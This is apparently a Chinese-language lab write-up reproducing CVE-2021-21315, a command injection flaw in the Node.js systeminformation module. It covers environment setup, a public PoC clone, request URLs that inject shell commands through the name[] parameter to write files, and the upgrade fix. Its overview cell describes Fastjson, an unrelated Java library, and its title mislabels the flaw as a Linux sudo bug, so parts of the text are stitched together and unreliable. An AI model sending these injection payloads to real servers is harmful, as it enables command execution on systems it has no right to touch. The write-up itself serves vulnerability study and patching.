CVE-2021-21315 Linux sudoNode.js命令注入
漏洞简介
Node.js是一个基于Chrome V8引擎的JavaScript运行环境,用于方便的搭建响应速度快、易于拓展的网络应用,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。Node使用Module模块划分不同的功能,每一个模块都包含非常丰富的函数,如http就包含了和http相关的很多函数,帮助开发者对http、tcp/udp等进行操作或创建相关服务器。
漏洞原理
Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。
漏洞信息
| 漏洞名称 | Linux sudoNode.js命令注入漏洞 |
|---|---|
| 漏洞编号 | CVE-2021-21315 |
| 危害等级 | 严重 |
| CVSS评分 | 7.8 |
| 漏洞类型 | Node.js-systeminformation |
| 漏洞厂商 | node |
| 漏洞组件 | Node.js-systeminformation |
| 受影响版本 | Systeminformation < 5.3.1 |
| 漏洞概述 | Fastjson是一个阿里巴巴Java语言编写的高性能JSON库。采用“假定有序快速匹配”的算法,号称Java语言中最快的JSON库。Fastjson接口简单易用,广泛使用在缓存序列化、协议交互、Web输出、Android客户端提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化 |
环境搭建
? Linux操作系统(Ubuntu)
? nodejs(linux)
1.Nodejs安装
wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz
2.更换文件名字为nodejs,并将该文件移至 /usr/local/sbin/目录下
mv node-v12.18.4-linux-x64 nodejs
mv nodejs/ /usr/local/sbin/
3.更换文件node和npm的软连接
ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/
4.运行node.js看是否配置成功
漏洞复现
1.POC下载
git clone git://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
2.nodejs起http
3.执行poc
http://192.168.32.161:8000/api/getServices?name[]=$(echo -e ‘NULL’ > 1.txt)
http://ip:8000/api/getServices?name[]=$(echo -e 'zeeker' > test.txt)
4.查看
5.发现存在text.txt和1.txt文件
漏洞修复
将 systeminformation 及时升级到 5.3.1 或更高版本